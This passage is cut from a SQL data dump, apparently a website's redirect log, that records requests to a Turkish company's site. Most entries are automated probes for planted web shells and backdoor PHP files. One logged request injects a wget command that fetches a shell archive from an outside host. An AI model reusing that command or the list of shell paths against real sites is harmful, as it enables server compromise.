00:00:00',301),(46684,'http://mail.3s-technologies.com.tr/tr/va.php',NULL,'','',1,0,'2025-09-10 17:06:07','0000-00-00 00:00:00',301),(46685,'http://mail.3s-technologies.com.tr/tr/fork.php',NULL,'','',1,0,'2025-09-10 17:06:08','0000-00-00 00:00:00',301),(46686,'http://mail.3s-technologies.com.tr/tr/gif.php',NULL,'','',3,0,'2025-09-10 17:06:09','0000-00-00 00:00:00',301),(46687,'http://mail.3s-technologies.com.tr/tr/inc.php',NULL,'','',8,0,'2025-09-10 17:06:10','0000-00-00 00:00:00',301),(46688,'http://mail.3s-technologies.com.tr/tr/abhgt.php',NULL,'','',1,0,'2025-09-10 17:06:11','0000-00-00 00:00:00',301),(46689,'http://mail.3s-technologies.com.tr/tr/wp-omo.php',NULL,'','',1,0,'2025-09-10 17:06:11','0000-00-00 00:00:00',301),(46690,'http://mail.3s-technologies.com.tr/tr/hook.php',NULL,'','',17,0,'2025-09-10 17:06:12','0000-00-00 00:00:00',301),(46691,'http://mail.3s-technologies.com.tr/tr/jquery.php',NULL,'','',4,0,'2025-09-10 17:06:14','0000-00-00 00:00:00',301),(46692,'http://mail.3s-technologies.com.tr/tr/wio.php',NULL,'','',6,0,'2025-09-10 17:06:15','0000-00-00 00:00:00',301),(46693,'http://mail.3s-technologies.com.tr/tr/tund.php',NULL,'','',1,0,'2025-09-10 17:06:16','0000-00-00 00:00:00',301),(46694,'http://mail.3s-technologies.com.tr/tr/claa.php',NULL,'','',3,0,'2025-09-10 17:06:17','0000-00-00 00:00:00',301),(46695,'http://mail.3s-technologies.com.tr/tr/.well-known/acme-challenge/about.php',NULL,'','',20,0,'2025-09-10 17:06:45','0000-00-00 00:00:00',301),(46696,'http://mail.3s-technologies.com.tr/tr/default.php',NULL,'','',48,0,'2025-09-10 17:06:46','0000-00-00 00:00:00',301),(46697,'http://mail.3s-technologies.com.tr/tr/wp-includes/certificates/plugins.php',NULL,'','',3,0,'2025-09-10 17:06:47','0000-00-00 00:00:00',301),(46698,'http://mail.3s-technologies.com.tr/tr/foot.php',NULL,'','',1,0,'2025-09-10 17:06:48','0000-00-00 00:00:00',301),(46699,'http://mail.3s-technologies.com.tr/tr/c1.php',NULL,'','',7,0,'2025-09-10 17:06:49','0000-00-00 00:00:00',301),(46700,'http://mail.3s-technologies.com.tr/tr/rjv.php',NULL,'','',2,0,'2025-09-10 17:06:49','0000-00-00 00:00:00',301),(46701,'http://mail.3s-technologies.com.tr/tr/articles.php',NULL,'','',1,0,'2025-09-10 17:07:03','0000-00-00 00:00:00',301),(46702,'http://3s-technologies.com.tr/tr/includes/deletes.php?aresin_annesi=wget+http://phpweb.com.tr/shell.php.zip',NULL,'','',1,0,'2025-09-10 19:40:16','0000-00-00 00:00:00',301),(46703,'http://www.3s-technologies.com.tr/en/wood-processing-ahşap-işleme\n',NULL,'','',3,0,'2025-09-10 21:36:06','0000-00-00 00:00:00',301),(46704,'https://www.3s-technologies.com.tr/tr/inner-strategy-342420.appspot.com/landing.svg',NULL,'https://www.3s-technologies.com.tr/inner-strategy-342420.appspot.com/landing.svg','',5,0,'2025-09-11 02:34:22','0000-00-00 00:00:00',301),(46705,'https://3s-technologies.com.tr/tr/readme.html',NULL,'','',2,0,'2025-09-11 14:16:19','0000-00-00 00:00:00',301),(46706,'https://3s-technologies.com.tr/tr/wp-admin/fmadmin.php',NULL,'','',1,0,'2025-09-11 14:16:19','0000-00-00 00:00:00',301),(46707,'https://www.3s-technologies.com.tr/tr/qmnpukxccz5qohwlwdaikgp9vjtrqgtszyyjr7bccwl3yt',NULL,'https://www.3s-technologies.com.tr/QmNPukXccZ5qohWLwdaikGp9vjTrqGtSZYYjR7bCCwL3yt','',3,0,'2025-09-11 16:29:27','0000-00-00 00:00:00',301),(46708,'http://3s-technologies.com.tr/en/news',NULL,'https://movemo.com.tr/wp-login.php','',7,0,'2025-09-11 17:00:37','0000-00-00 00:00:00',301),(46709,'http://3s-technologies.com.tr/tr/pub/rf',NULL,'http://3s-technologies.com.tr/pub/rf','',2,0,'2025-09-11 18:55:16','0000-00-00 00:00:00',301),(46710,'http://mail.3s-technologies.com.tr/tr/slo.php',NULL,'','',6,0,'2025-09-12 01:42:58','0000-00-00 00:00:00',301),(46711,'http://mail.3s-technologies.com.tr/tr/blurbs8.php',NULL,'','',1,0,'2025-09-12 01:42:58','0000-00-00 00:00:00',301),(46712,'http://mail.3s-technologies.com.tr/tr/an.php',NULL,'','',44,0,'2025-09-12 01:42:59','0000-00-00 00:00:00',301),(46713,'http://mail.3s-technologies.com.tr/tr/aa8.php',NULL,'','',1,0,'2025-09-12 01:43:00','0000-00-00 00:00:00',301),(46714,'http://mail.3s-technologies.com.tr/tr/akc.php',NULL,'','',6,0,'2025-09-12 01:43:03','0000-00-00 00:00:00',301),(46715,'http://mail.3s-technologies.com.tr/tr/ggs.php',NULL,'','',1,0,'2025-09-12 01:43:04','0000-00-00 00:00:00',301),(46716,'http://mail.3s-technologies.com.tr/tr/sder52u.php',NULL,'','',3,0,'2025-09-12 01:43:06','0000-00-00 00:00:00',301),(46717,'http://mail.3s-technologies.com.tr/tr/v3.php',NULL,'','',26,0,'2025-09-12 01:43:07','0000-00-00 00:00:00',301),(46718,'http://mail.3s-technologies.com.tr/tr/zc-749.php',NULL,'','',4,0,'2025-09-12 01:43:09','0000-00-00 00:00:00',301),(46719,'http://mail.3s-technologies.com.tr/tr/aw.php',NULL,'','',11,0,'2025-09-12 01:43:11','0000-00-00 00:00:00',301),(46720,'http://mail.3s-technologies.com.tr/tr/bless2.php',NULL,'','',10,0,'2025-09-12 01:43:14','0000-00-00 00:00:00',301),(46721,'http://mail.3s-technologies.com.tr/tr/sarang.php',NULL,'','',1,0,'2025-09-12 01:43:15','0000-00-00 00:00:00',301),(46722,'http://mail.3s-technologies.com.tr/tr/bypass.php',NULL,'','',15,0,'2025-09-12 01:43:17','0000-00-00 00:00:00',301),(46723,'http://3s-technologies.com.tr/tr/slo.php',NULL,'','',8,0,'2025-09-12 02:00:18','0000-00-00 00:00:00',301),(46724,'http://3s-technologies.com.tr/tr/blurbs8.php',NULL,'','',3,0,'2025-09-12 02:00:18','0000-00-00 00:00:00',301),(46725,'http://3s-technologies.com.tr/tr/ggs.php',NULL,'','',3,0,'2025-09-12 02:00:25','0000-00-00 00:00:00',301),(46726,'http://3s-technologies.com.tr/tr/sder52u.php',NULL,'','',4,0,'2025-09-12 02:00:27','0000-00-00 00:00:00',301),(46727,'http://3s-technologies.com.tr/tr/zc-749.php',NULL,'','',6,0,'2025-09-12 02:00:29','0000-00-00 00:00:00',301),(46728,'http://mail.3s-technologies.com.tr/tr/ilex.php',NULL,'','',19,0,'2025-09-12 05:21:41','0000-00-00 00:00:00',301),(46729,'http://mail.3s-technologies.com.tr/tr/afile.php',NULL,'','',8,0,'2025-09-12 05:21:41','0000-00-00 00:00:00',301),(46730,'http://mail.3s-technologies.com.tr/tr/bfile.php',NULL,'','',1,0,'2025-09-12 05:21:42','0000-00-00 00:00:00',301),(46731,'http://mail.3s-technologies.com.tr/tr/dfile.php',NULL,'','',1,0,'2025-09-12 05:21:43','0000-00-00 00:00:00',301),(46732,'http://mail.3s-technologies.com.tr/tr/hfile.php',NULL,'','',1,0,'2025-09-12 05:21:45','0000-00-00 00:00:00',301),(46733,'http://mail.3s-technologies.com.tr/tr/ifile.php',NULL,'','',1,0,'2025-09-12 05:21:46','0000-00-00 00:00:00',301),(46734,'http://mail.3s-technologies.com.tr/tr/jfile.php',NULL,'','',1,0,'2025-09-12 05:21:46','0000-00-00 00:00:00',301),(46735,'http://mail.3s-technologies.com.tr/tr/kfile.php',NULL,'','',1,0,'2025-09-12 05:21:47','0000-00-00 00:00:00',301),(46736,'http://mail.3s-technologies.com.tr/tr/lfile.php',NULL,'','',1,0,'2025-09-12 05:21:47','0000-00-00 00:00:00',301),(46737,'http://mail.3s-technologies.com.tr/tr/mfile.php',NULL,'','',1,0,'2025-09-12 05:21:48','0000-00-00 00:00:00',301),(46738,'http://mail.3s-technologies.com.tr/tr/nfile.php',NULL,'','',12,0,'2025-09-12 05:21:48','0000-00-00 00:00:00',301),(46739,'http://mail.3s-technologies.com.tr/tr/ofile.php',NULL,'','',1,0,'2025-09-12 05:21:49','0000-00-00 00:00:00',301),(46740,'http://mail.3s-technologies.com.tr/tr/pfile.php',NULL,'','',1,0,'2025-09-12 05:21:49','0000-00-00 00:00:00',301),(46741,'http://mail.3s-technologies.com.tr/tr/qfile.php',NULL,'','',1,0,'2025-09-12 05:21:50','0000-00-00 00:00:00',301),(46742,'http://mail.3s-technologies.com.tr/tr/rfile.php',NULL,'','',1,0,'2025-09-12 05:21:50','0000-00-00 00:00:00',301),(46743,'http://mail.3s-technologies.com.tr/tr/sfile.php',NULL,'','',1,0,'2025-09-12 05:21:51','0000-00-00 00:00:00',301),(46744,'http://mail.3s-technologies.com.tr/tr/tfile.php',NULL,'','',1,0,'2025-09-12 05:21:51','0000-00-00 00:00:00',301),(46745,'http://mail.3s-technologies.com.tr/tr/ufile.php',NULL,'','',1,0,'2025-09-12 05:21:52','0000-00-00 00:00:00',301),(46746,'http://mail.3s-technologies.com.tr/tr/vfile.php',NULL,'','',1,0,'2025-09-12 05:21:52','0000-00-00 00:00:00',301),(46747,'http://mail.3s-technologies.com.tr/tr/wfile.php',NULL,'','',25,0,'2025-09-12 05:21:53','0000-00-00 00:00:00',301),(46748,'http://mail.3s-technologies.com.tr/tr/xfile.php',NULL,'','',1,0,'2025-09-12 05:21:53','0000-00-00 00:00:00',301),(46749,'http://mail.3s-technologies.com.tr/tr/yfile.php',NULL,'','',1,0,'2025-09-12 05:21:54','0000-00-00 00:00:00',301),(46750,'http://mail.3s-technologies.com.tr/tr/zfile.php',NULL,'','',6,0,'2025-09-12 05:21:54','0000-00-00 00:00:00',301),(46751,'http://mail.3s-technologies.com.tr/tr/file0.php',NULL,'','',2,0,'2025-09-12 05:21:55','0000-00-00 00:00:00',301),(46752,'http://mail.3s-technologies.com.tr/tr/file10.php',NULL,'','',1,0,'2025-09-12 05:22:00','0000-00-00 00:00:00',301),(46753,'http://mail.3s-technologies.com.tr/tr/file11.php',NULL,'','',1,0,'2025-09-12 05:22:01','0000-00-00 00:00:00',301),(46754,'http://mail.3s-technologies.com.tr/tr/file12.php',NULL,'','',1,0,'2025-09-12 05:22:01','0000-00-00 00:00:00',301),(46755,'http://mail.3s-technologies.com.tr/tr/file13.php',NULL,'','',3,0,'2025-09-12 05:22:02','0000-00-00 00:00:00',301),(46756,'http://mail.3s-technologies.com.tr/tr/file16.php',NULL,'','',1,0,'2025-09-12 05:22:03','0000-00-00 00:00:00',301),(46757,'http://mail.3s-technologies.com.tr/tr/file18.php',NULL,'','',36,0,'2025-09-12 05:22:04','0000-00-00 00:00:00',301),(46758,'http://mail.3s-technologies.com.tr/tr/file19.php',NULL,'','',1,0,'2025-09-12 05:22:05','0000-00-00 00:00:00',301),(46759,'http://mail.3s-technologies.com.tr/tr/file20.php',NULL,'','',1,0,'2025-09-12 05:22:05','0000-00-00 00:00:00',301),(46760,'http://mail.3s-technologies.com.tr/tr/file403.php',NULL,'','',1,0,'2025-09-12 05:22:06','0000-00-00 00:00:00',301),(46761,'http://mail.3s-technologies.com.tr/tr/file404.php',NULL,'','',1,0,'2025-09-12 05:22:06','0000-00-00 00:00:00',301),(46762,'http://mail.3s-technologies.com.tr/tr/file88.php',NULL,'','',22,0,'2025-09-12 05:22:08','0000-00-00 00:00:00',301),(46763,'http://mail.3s-technologies.com.tr/tr/--.php',NULL,'','',3,0,'2025-09-12 05:22:09','0000-00-00 00:00:00',301),(46764,'http://mail.3s-technologies.com.tr/tr/jjlin.php',NULL,'','',2,0,'2025-09-12 05:22:09','0000-00-00 00:00:00',301),(46765,'http://mail.3s-technologies.com.tr/tr/gifclass4.php',NULL,'','',35,0,'2025-09-12 05:22:10','0000-00-00 00:00:00',301),(46766,'http://mail.3s-technologies.com.tr/tr/ilex2.php',NULL,'','',1,0,'2025-09-12 05:22:10','0000-00-00 00:00:00',301),(46767,'http://mail.3s-technologies.com.tr/tr/ppsu.php',NULL,'','',1,0,'2025-09-12 05:22:11','0000-00-00 00:00:00',301),(46768,'http://mail.3s-technologies.com.tr/tr/fe.php',NULL,'','',1,0,'2025-09-12 05:22:15','0000-00-00 00:00:00',301),(46769,'http://mail.3s-technologies.com.tr/tr/fe0.php',NULL,'','',1,0,'2025-09-12 05:22:16','0000-00-00 00:00:00',301),(46770,'http://mail.3s-technologies.com.tr/tr/fe1.php',NULL,'','',1,0,'2025-09-12 05:22:16','0000-00-00 00:00:00',301),(46771,'http://mail.3s-technologies.com.tr/tr/fe2.php',NULL,'','',1,0,'2025-09-12 05:22:17','0000-00-00 00:00:00',301),(46772,'http://mail.3s-technologies.com.tr/tr/fe3.php',NULL,'','',1,0,'2025-09-12 05:22:17','0000-00-00 00:00:00',301),(46773,'http://mail.3s-technologies.com.tr/tr/fe4.php',NULL,'','',1,0,'2025-09-12 05:22:18','0000-00-00 00:00:00',301),(46774,'http://mail.3s-technologies.com.tr/tr/fe6.php',NULL,'','',1,0,'2025-09-12 05:22:19','0000-00-00 00:00:00',301),(46775,'http://mail.3s-technologies.com.tr/tr/fe7.php',NULL,'','',1,0,'2025-09-12 05:22:19','0000-00-00 00:00:00',301),(46776,'http://mail.3s-technologies.com.tr/tr/fe8.php',NULL,'','',1,0,'2025-09-12 05:22:20','0000-00-00 00:00:00',301),(46777,'http://mail.3s-technologies.com.tr/tr/fe9.php',NULL,'','',1,0,'2025-09-12 05:22:21','0000-00-00 00:00:00',301),(46778,'http://mail.3s-technologies.com.tr/tr/fe10.php',NULL,'','',1,0,'2025-09-12 05:22:21','0000-00-00 00:00:00',301),(46779,'http://mail.3s-technologies.com.tr/tr/errorfile.php',NULL,'','',4,0,'2025-09-12 05:22:28','0000-00-00 00:00:00',301),(46780,'http://3s-technologies.com.tr/tr/ilex.php',NULL,'','',32,0,'2025-09-12 06:31:24','0000-00-00 00:00:00',301),(46781,'http://3s-technologies.com.tr/tr/afile.php',NULL,'','',17,0,'2025-09-12 06:31:24','0000-00-00 00:00:00',301),(46782,'http://3s-technologies.com.tr/tr/bfile.php',NULL,'','',1,0,'2025-09-12 06:31:25','0000-00-00 00:00:00',301),(46783,'http://3s-technologies.com.tr/tr/dfile.php',NULL,'','',1,0,'2025-09-12 06:31:26','0000-00-00 00:00:00',301),(46784,'http://3s-technologies.com.tr/tr/hfile.php',NULL,'','',1,0,'2025-09-12 06:31:28','0000-00-00 00:00:00',301),(46785,'http://3s-technologies.com.tr/tr/ifile.php',NULL,'','',1,0,'2025-09-12 06:31:28','0000-00-00 00:00:00',301),(46786,'http://3s-technologies.com.tr/tr/jfile.php',NULL,'','',1,0,'2025-09-12 06:31:29','0000-00-00 00:00:00',301),(46787,'http://3s-technologies.com.tr/tr/kfile.php',NULL,'','',1,0,'2025-09-12 06:31:29','0000-00-00 00:00:00',301),(46788,'http://3s-technologies.com.tr/tr/lfile.php',NULL,'','',1,0,'2025-09-12 06:31:30','0000-00-00 00:00:00',301),(46789,'http://3s-technologies.com.tr/tr/mfile.php',NULL,'','',1,0,'2025-09-12 06:31:30','0000-00-00 00:00:00',301),(46790,'http://3s-technologies.com.tr/tr/ofile.php',NULL,'','',1,0,'2025-09-12 06:31:31','0000-00-00 00:00:00',301),(46791,'http://3s-technologies.com.tr/tr/pfile.php',NULL,'','',1,0,'2025-09-12 06:31:32','0000-00-00 00:00:00',301),(46792,'http://3s-technologies.com.tr/tr/qfile.php',NULL,'','',1,0,'2025-09-12 06:31:32','0000-00-00 00:00:00',301),(46793,'http://3s-technologies.com.tr/tr/rfile.php',NULL,'','',1,0,'2025-09-12 06:31:33','0000-00-00 00:00:00',301),(46794,'http://3s-technologies.com.tr/tr/sfile.php',NULL,'','',1,0,'2025-09-12 06:31:34','0000-00-00 00:00:00',301),(46795,'http://3s-technologies.com.tr/tr/tfile.php',NULL,'','',1,0,'2025-09-12 06:31:34','0000-00-00 00:00:00',301),(46796,'http://3s-technologies.com.tr/tr/ufile.php',NULL,'','',1,0,'2025-09-12 06:31:35','0000-00-00 00:00:00',301),(46797,'http://3s-technologies.com.tr/tr/vfile.php',NULL,'','',1,0,'2025-09-12 06:31:35','0000-00-00 00:00:00',301),(46798,'http://3s-technologies.com.tr/tr/wfile.php',NULL,'','',33,0,'2025-09-12 06:31:36','0000-00-00 00:00:00',301),(46799,'http://3s-technologies.com.tr/tr/xfile.php',NULL,'','',1,0,'2025-09-12 06:31:36','0000-00-00 00:00:00',301),(46800,'http://3s-technologies.com.tr/tr/yfile.php',NULL,'','',1,0,'2025-09-12 06:31:37','0000-00-00 00:00:00',301),(46801,'http://3s-technologies.com.tr/tr/zfile.php',NULL,'','',17,0,'2025-09-12 06:31:37','0000-00-00 00:00:00',301),(46802,'http://3s-technologies.com.tr/tr/file0.php',NULL,'','',3,0,'2025-09-12 06:31:38','0000-00-00 00:00:00',301),(46803,'http://3s-technologies.com.tr/tr/file1.php',NULL,'','',61,0,'2025-09-12 06:31:39','0000-00-00 00:00:00',301),(46804,'http://3s-technologies.com.tr/tr/file10.php',NULL,'','',2,0,'2025-09-12 06:31:43','0000-00-00 00:00:00',301),(46805,'http://3s-technologies.com.tr/tr/file20.php',NULL,'','',1,0,'2025-09-12 06:31:48','0000-00-00 00:00:00',301),(46806,'http://3s-technologies.com.tr/tr/file403.php',NULL,'','',1,0,'2025-09-12 06:31:48','0000-00-00 00:00:00',301),(46807,'http://3s-technologies.com.tr/tr/file88.php',NULL,'','',46,0,'2025-09-12 06:31:50','0000-00-00 00:00:00',301),(46808,'http://3s-technologies.com.tr/tr/--.php',NULL,'','',6,0,'2025-09-12 06:31:51','0000-00-00 00:00:00',301),(46809,'http://3s-technologies.com.tr/tr/jjlin.php',NULL,'','',4,0,'2025-09-12 06:31:52','0000-00-00 00:00:00',301),(46810,'http://3s-technologies.com.tr/tr/gifclass4.php',NULL,'','',61,0,'2025-09-12 06:31:52','0000-00-00 00:00:00',301),(46811,'http://3s-technologies.com.tr/tr/ilex2.php',NULL,'','',1,0,'2025-09-12 06:31:53','0000-00-00 00:00:00',301),(46812,'http://3s-technologies.com.tr/tr/ppsu.php',NULL,'','',1,0,'2025-09-12 06:31:53','0000-00-00 00:00:00',301),(46813,'http://3s-technologies.com.tr/tr/lala.php',NULL,'','',83,0,'2025-09-12 06:31:54','0000-00-00 00:00:00',301),(46814,'http://3s-technologies.com.tr/tr/fe.php',NULL,'','',1,0,'2025-09-12 06:31:57','0000-00-00 00:00:00',301),(46815,'http://3s-technologies.com.tr/tr/fe0.php',NULL,'','',1,0,'2025-09-12 06:31:58','0000-00-00 00:00:00',301),(46816,'http://3s-technologies.com.tr/tr/fe1.php',NULL,'','',1,0,'2025-09-12 06:31:58','0000-00-00 00:00:00',301),(46817,'http://3s-technologies.com.tr/tr/fe2.php',NULL,'','',1,0,'2025-09-12 06:31:59','0000-00-00 00:00:00',301),(46818,'http://3s-technologies.com.tr/tr/fe3.php',NULL,'','',1,0,'2025-09-12 06:31:59','0000-00-00 00:00:00',301),(46819,'http://3s-technologies.com.tr/tr/fe4.php',NULL,'','',1,0,'2025-09-12 06:32:00','0000-00-00 00:00:00',301),(46820,'http://3s-technologies.com.tr/tr/fe6.php',NULL,'','',1,0,'2025-09-12 06:32:01','0000-00-00 00:00:00',301),(46821,'http://3s-technologies.com.tr/tr/fe7.php',NULL,'','',1,0,'2025-09-12 06:32:01','0000-00-00 00:00:00',301),(46822,'http://3s-technologies.com.tr/tr/fe8.php',NULL,'','',1,0,'2025-09-12 06:32:02','0000-00-00 00:00:00',301),(46823,'http://3s-technologies.com.tr/tr/fe9.php',NULL,'','',1,0,'2025-09-12 06:32:02','0000-00-00 00:00:00',301),(46824,'http://3s-technologies.com.tr/tr/fe10.php',NULL,'','',1,0,'2025-09-12 06:32:03','0000-00-00 00:00:00',301),(46825,'http://3s-technologies.com.tr/tr/cccc.php',NULL,'','',23,0,'2025-09-12 06:32:03','0000-00-00 00:00:00',301),(46826,'http://3s-technologies.com.tr/tr/eauu.php',NULL,'','',23,0,'2025-09-12 06:32:04','0000-00-00 00:00:00',301),(46827,'http://3s-technologies.com.tr/tr/errorfile.php',NULL,'','',5,0,'2025-09-12 06:32:09','0000-00-00 00:00:00',301),(46828,'https://www.3s-technologies.com.tr/en/plugins/content/jw_allvideos/jw_allvideos/includes/js/\'   videoposter   \'',NULL,'','',2,0,'2025-09-13 05:00:34','0000-00-00 00:00:00',301),(46829,'https://www.3s-technologies.com.tr/tr/dalga-lehimleme\n',NULL,'','',1,0,'2025-09-13 10:38:53','0000-00-00 00:00:00',301),(46830,'https://3s-technologies.com.tr/tr/kursunsuz-lehim\n',NULL,'','',2,0,'2025-09-13 14:09:01','0000-00-00 00:00:00',301),(46831,'https://3s-technologies.com.tr/tr/wp-admin/css/midnight/fmanager.php',NULL,'','',1,0,'2025-09-13 17:58:29','0000-00-00 00:00:00',301),(46832,'https://3s-technologies.com.tr/tr/wp-content/themes/theme.php',NULL,'','',1,0,'2025-09-13 17:58:29','0000-00-00 00:00:00',301),(46833,'https://3s-technologies.com.tr/tr/wp-options.php',NULL,'','',1,0,'2025-09-13 17:58:29','0000-00-00 00:00:00',301),(46834,'https://3s-technologies.com.tr/tr/wp-includes/css/dist/niil.php',NULL,'','',1,0,'2025-09-13 17:58:29','0000-00-00 00:00:00',301),(46835,'https://3s-technologies.com.tr/tr/wp-includes/simplepie/content/type/wp-yeni.php',NULL,'','',1,0,'2025-09-13 17:58:29','0000-00-00 00:00:00',301),(46836,'https://3s-technologies.com.tr/tr/wp-admin/css/modern/adminer.php',NULL,'','',1,0,'2025-09-13 17:58:29','0000-00-00 00:00:00',301),(46837,'https://3s-technologies.com.tr/tr/wp-includes/requests/src/utility/tiny.php',NULL,'','',1,0,'2025-09-13 17:58:29','0000-00-00 00:00:00',301),(46838,'https://3s-technologies.com.tr/tr/wp-content/themes/arkhe/styles.php',NULL,'','',1,0,'2025-09-13 17:58:29','0000-00-00 00:00:00',301),(46839,'https://3s-technologies.com.tr/tr/wp-includes/css/dist.php',NULL,'','',1,0,'2025-09-13 17:58:29','0000-00-00 00:00:00',301),(46840,'https://3s-technologies.com.tr/tr/wp-includes/css/dist/wp-niil.php',NULL,'','',1,0,'2025-09-13 17:58:30','0000-00-00 00:00:00',301),(46841,'https://3s-technologies.com.tr/tr/wp-includes/css/dist/sok.php',NULL,'','',1,0,'2025-09-13 17:58:30','0000-00-00 00:00:00',301),(46842,'https://3s-technologies.com.tr/tr/wp-content/plugins/meta-box-aio/languages/meta-box/meta-box-tr_tr.l10n.php',NULL,'','',1,0,'2025-09-13 17:58:30','0000-00-00 00:00:00',301),(46843,'https://3s-technologies.com.tr/tr/wp-includes/wp-shell.php',NULL,'','',1,0,'2025-09-13 17:58:32','0000-00-00 00:00:00',301),(46844,'https://3s-technologies.com.tr/tr/aaaa.php',NULL,'','',1,0,'2025-09-13 17:58:32','0000-00-00 00:00:00',301),(46845,'https://3s-technologies.com.tr/tr/devastator.php',NULL,'','',1,0,'2025-09-13 17:58:32','0000-00-00 00:00:00',301),(46846,'https://3s-technologies.com.tr/tr/wp-includes/simplepie/content/type/wp-y spurred.php',NULL,'','',1,0,'2025-09-13 17:58:33','0000-00-00 00:00:00',301),(46847,'https://3s-technologies.com.tr/tr/wp-includes/requests/src/system.php',NULL,'','',1,0,'2025-09-13 17:58:33','0000-00-00 00:00:00',301),(46848,'https://3s-technologies.com.tr/tr/class.mail.php',NULL,'','',1,0,'2025-09-13 17:58:33','0000-00-00 00:00:00',301),(46849,'https://3s-technologies.com.tr/tr/wp-includes/fonts/ozels.php',NULL,'','',1,0,'2025-09-13 17:58:33','0000-00-00 00:00:00',301),(46850,'https://3s-technologies.com.tr/en/using-joomla/extensions/components/users-component/en/products-en/user/',NULL,'https://3s-technologies.com.tr/en/products-en/user/','',1,0,'2025-09-13 21:48:29','0000-00-00 00:00:00',301),(46851,'http://3s-technologies.com.tr/tr/nh19t66t.php',NULL,'','',5,0,'2025-09-14 11:30:20','0000-00-00 00:00:00',301),(46852,'http://3s-technologies.com.tr/tr/rei.php',NULL,'','',6,0,'2025-09-14 11:30:21','0000-00-00 00:00:00',301),(46853,'http://3s-technologies.com.tr/tr/888.php',NULL,'','',7,0,'2025-09-14 11:30:24','0000-00-00 00:00:00',301),(46854,'http://3s-technologies.com.tr/tr/555.php',NULL,'','',29,0,'2025-09-14 11:30:25','0000-00-00 00:00:00',301),(46855,'http://3s-technologies.com.tr/tr/filesss.php',NULL,'','',48,0,'2025-09-14 11:30:33','0000-00-00 00:00:00',301),(46856,'http://3s-technologies.com.tr/tr/wp-freya.php',NULL,'','',25,0,'2025-09-14 11:30:48','0000-00-00 00:00:00',301),(46857,'http://3s-technologies.com.tr/tr/keu.php',NULL,'','',13,0,'2025-09-14 11:30:49','0000-00-00 00:00:00',301),(46858,'http://3s-technologies.com.tr/tr/0%.php',NULL,'','',5,0,'2025-09-14 11:30:50','0000-00-00 00:00:00',301),(46859,'http://3s-technologies.com.tr/tr/fs.php',NULL,'','',97,0,'2025-09-14 11:30:55','0000-00-00 00:00:00',301),(46860,'http://3s-technologies.com.tr/tr/444.php',NULL,'','',34,0,'2025-09-14 11:31:07','0000-00-00 00:00:00',301),(46861,'http://3s-technologies.com.tr/tr/vast.php',NULL,'','',10,0,'2025-09-14 11:31:13','0000-00-00 00:00:00',301),(46862,'https://3s-technologies.com.tr/tr/info',NULL,'','',4,0,'2025-09-14 16:47:15','0000-00-00 00:00:00',301),(46863,'http://3s-technologies.com.tr/tr/xpas2.php',NULL,'','',4,0,'2025-09-14 21:44:50','0000-00-00 00:00:00',301),(46864,'http://3s-technologies.com.tr/tr/wp-content/plugins/lwbdene/index.php',NULL,'','',1,0,'2025-09-15 12:34:31','0000-00-00 00:00:00',301),(46865,'http://3s-technologies.com.tr/tr/wsr2.php',NULL,'','',9,0,'2025-09-15 12:34:50','0000-00-00 00:00:00',301),(46866,'https://3s-technologies.com.tr/tr/dalga-lehimleme\n',NULL,'','',1,0,'2025-09-15 14:46:12','0000-00-00 00:00:00',301),(46867,'http://3s-technologies.com.tr/tr/cabs.php',NULL,'','',40,0,'2025-09-15 16:08:21','0000-00-00 00:00:00',301),(46868,'http://3s-technologies.com.tr/tr/huangs.php',NULL,'','',6,0,'2025-09-15 16:08:23','0000-00-00 00:00:00',301),(46869,'http://3s-technologies.com.tr/tr/vee.php',NULL,'','',54,0,'2025-09-15 16:08:24','0000-00-00 00:00:00',301),(46870,'http://3s-technologies.com.tr/tr/gelap.php',NULL,'','',8,0,'2025-09-15 16:08:26','0000-00-00 00:00:00',301),(46871,'http://3s-technologies.com.tr/tr/class19.php',NULL,'','',69,0,'2025-09-15 16:08:27','0000-00-00 00:00:00',301),(46872,'http://3s-technologies.com.tr/tr/tyasd.php',NULL,'','',2,0,'2025-09-15 16:08:28','0000-00-00 00:00:00',301),(46873,'http://3s-technologies.com.tr/tr/ff2.php',NULL,'','',11,0,'2025-09-15 16:08:29','0000-00-00 00:00:00',301),(46874,'http://3s-technologies.com.tr/tr/aa2.php',NULL,'','',16,0,'2025-09-15 16:08:30','0000-00-00 00:00:00',301),(46875,'http://3s-technologies.com.tr/tr/ipil.php',NULL,'','',2,0,'2025-09-15 16:08:33','0000-00-00 00:00:00',301),(46876,'http://3s-technologies.com.tr/tr/vanta.php',NULL,'','',12,0,'2025-09-15 16:08:34','0000-00-00 00:00:00',301),(46877,'http://3s-technologies.com.tr/tr/bp.php',NULL,'','',10,0,'2025-09-15 16:08:37','0000-00-00 00:00:00',301),(46878,'http://3s-technologies.com.tr/tr/blex.php',NULL,'','',7,0,'2025-09-15 16:08:40','0000-00-00 00:00:00',301),(46879,'http://3s-technologies.com.tr/tr/ssss.php',NULL,'','',16,0,'2025-09-15 16:08:41','0000-00-00 00:00:00',301),(46880,'http://3s-technologies.com.tr/tr/akses.php',NULL,'','',12,0,'2025-09-15 16:08:41','0000-00-00 00:00:00',301),(46881,'http://3s-technologies.com.tr/tr/fass.php',NULL,'','',6,0,'2025-09-15 16:08:42','0000-00-00 00:00:00',301),(46882,'http://3s-technologies.com.tr/tr/0x0x.php',NULL,'','',21,0,'2025-09-15 16:08:43','0000-00-00 00:00:00',301),(46883,'http://3s-technologies.com.tr/tr/xrp.php',NULL,'','',10,0,'2025-09-15 16:08:44','0000-00-00 00:00:00',301),(46884,'http://3s-technologies.com.tr/tr/wp-pridmag/up.php',NULL,'','',1,0,'2025-09-15 18:15:18','0000-00-00 00:00:00',301),(46885,'http://3s-technologies.com.tr/tr/ova-wso.php',NULL,'','',5,0,'2025-09-15 18:44:08','0000-00-00 00:00:00',301),(46886,'http://3s-technologies.com.tr/tr/hk.php',NULL,'','',22,0,'2025-09-15 18:44:10','0000-00-00 00:00:00',301),(46887,'http://3s-technologies.com.tr/tr/mg.php',NULL,'','',6,0,'2025-09-15 18:44:10','0000-00-00 00:00:00',301),(46888,'http://3s-technologies.com.tr/tr/drunk.php',NULL,'','',2,0,'2025-09-15 18:44:12','0000-00-00 00:00:00',301),(46889,'http://3s-technologies.com.tr/tr/x0.php',NULL,'','',8,0,'2025-09-15 18:44:14','0000-00-00 00:00:00',301),(46890,'http://3s-technologies.com.tr/tr/hackfut_4927.php',NULL,'','',2,0,'2025-09-15 18:44:15','0000-00-00 00:00:00',301),(46891,'http://3s-technologies.com.tr/tr/ig4i9t.php',NULL,'','',2,0,'2025-09-15 18:44:15','0000-00-00 00:00:00',301),(46892,'http://3s-technologies.com.tr/tr/qcivq.php',NULL,'','',2,0,'2025-09-15 18:44:16','0000-00-00 